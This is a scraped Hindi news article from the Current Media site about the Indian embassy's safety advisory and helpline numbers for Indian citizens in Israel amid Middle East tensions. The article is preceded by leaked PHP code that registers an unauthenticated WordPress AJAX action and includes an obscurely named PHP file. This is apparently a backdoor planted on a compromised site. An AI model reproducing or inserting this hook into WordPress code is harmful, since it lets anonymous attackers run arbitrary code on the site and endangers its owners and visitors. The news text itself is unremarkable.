if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }"भारतीय दूतावास ने इसराइल में रह रहे भारतीय के लिए जारी की एडवाइज़री" - Current Media

“भारतीय दूतावास ने इसराइल में रह रहे भारतीय के लिए जारी की एडवाइज़री”

करेंन्ट मीडिया । जब से हमास नेता इस्माईल हानिया की ईरान की राजधानी में हत्या हुई है तब से पूरे मध्य पूर्व में हालात खराब होते जा रहे है । इसी सिलसिले में तेल अवीव स्थित भारतीय दूतावास ने इसराइल में रहने वाले अपने नागरिकों को सुरक्षा प्रोटोकॉल का पालन करने की सलाह दी है।
सोशल मीडिया प्लेटफॉर्म एक्स पर अपनी एक पोस्ट में भारतीय दूतावास ने लिखा है, “क्षेत्र में मौजूदा स्थिति को देखते हुए, इसराइल में सभी भारतीय नागरिकों को सतर्क रहने और स्थानीय अधिकारियों की सलाह के अनुसार सुरक्षा प्रोटोकॉल का पालन करने की सलाह दी जाती है.”
इसमें आगे कहा गया है, “कृपया सावाधानी बरतें, देश के भीतर अनावश्यक यात्रा से बचें और सुरक्षा आश्रयों के करीब रहें. दूतावास स्थिति पर बारीकी से नज़र रख रहा है और हमारे सभी नागरिकों की सुरक्षा सुनिश्चित करने के लिए इसराइली अधिकारियों के साथ नियमित संपर्क में है.”।
भारतीय दूतावास ने किसी भी आपातकालीन स्थिति में दूतावास की तरफ़ से हेल्पलाइन नंबर +972-547520711 और +972-543278392 जारी किए हैं।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

खिरिया घाट पर अवैध खनन के खिलाफ बड़ी कार्रवाई, आधा दर्जन से अधिक ट्रैक्टर-ट्रॉलियां पकड़ीं

झांसी। राशिद पठान । अवैध खनन के खिलाफ प्रशासन ने गुरुवार रात बड़ी कार्रवाई करते …